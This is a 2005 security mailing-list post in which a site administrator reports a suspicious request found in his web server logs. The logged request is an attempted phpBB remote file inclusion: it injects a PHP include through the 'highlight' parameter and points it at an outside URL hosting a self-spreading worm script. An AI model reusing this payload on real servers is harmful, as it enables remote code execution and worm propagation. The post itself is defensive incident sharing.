Security Incidents mailing list archives
New (maybe old?) PhpBB worm about?
From: Robin <robin () kallisti net nz>
Date: Sun, 11 Dec 2005 02:11:24 +1300
I just noticed these in my logs: 63.193.240.128 - - [11/Dec/2005:01:43:25 +1300] "GET /pbem/viewtopic.php?t=37&highlight=%2527.$poster=include($_GET[m]). %2527&m=http://www.yatas.com/phpbb_private.txt?& HTTP/1.0" 403 1094 "http://www.google.nl/" "Mozilla/4.0 (modded by sirh0t fuck Aleks)" this is pointing to a phpBB install that I chmod'ed away just recently (it was unused and attracting spam), hence the 403. A quick google for the UA string doesn't show up anything, however the URL that it links to seems to contain a PHP script that at a quick glance uses Google and Lycos to find more phpBB sites and spread to them. (If the yatas.com link is gone, and anyone wants a copy of the file, mail me offlist) I'm also curious to know what the versions vulnerable to this exploit are. -- Robin <robin () kallisti net nz> JabberID: <eythian () jabber kallisti net nz> Hostes alienigeni me abduxerunt. Qui annus est? PGP Key 0xA99CEB6D = 5957 6D23 8B16 EFAB FEF8 7175 14D3 6485 A99C EB6D
Attachment:
_bin
Description:
Current thread:
- New (maybe old?) PhpBB worm about? Robin (Dec 12)
- Re: New (maybe old?) PhpBB worm about? bf (Dec 12)
- Re: New (maybe old?) PhpBB worm about? Alex 'CAVE' Cernat (Dec 14)